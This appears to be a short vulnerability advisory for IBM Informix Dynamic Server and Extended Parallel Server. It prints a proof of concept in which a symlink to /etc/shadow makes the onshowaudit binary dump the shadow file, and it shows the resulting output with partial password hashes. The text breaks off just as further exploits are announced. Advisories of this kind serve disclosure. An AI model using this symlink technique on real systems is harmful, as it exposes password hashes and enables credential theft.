|
|
IBM Informix Dynamic Server/Informix Extended Parallel Server Multiple Vulnerabilities
The following example has been supplied, as a proof of concept for the third vulnerability: [informix@dimoni tmp]$ ls -alc /etc/shadow -r-------- 1 root root 1020 Aug 10 01:59 /etc/shadow [informix@dimoni tmp]$ ln -s /etc/shadow .0 informix@dimoni tmp]$ /home/informix-9.40/bin/onshowaudit wait for the output .... aaa:!!:11635:0:99999:7::: pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7::: bbb:!!:11636:0:99999:7::: cccc:!!:11636:0:99999:7::: ddddd:!!:11647:0:99999:7::: aaaaaa:!!:11806:0:99999:7::: wwwwww:!!:11833:0:99999:7::: zzz:!!:12027:0:99999:7::: informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7::: Program Over. The following proof of concept exploits have been supplied: |
|
Privacy Statement |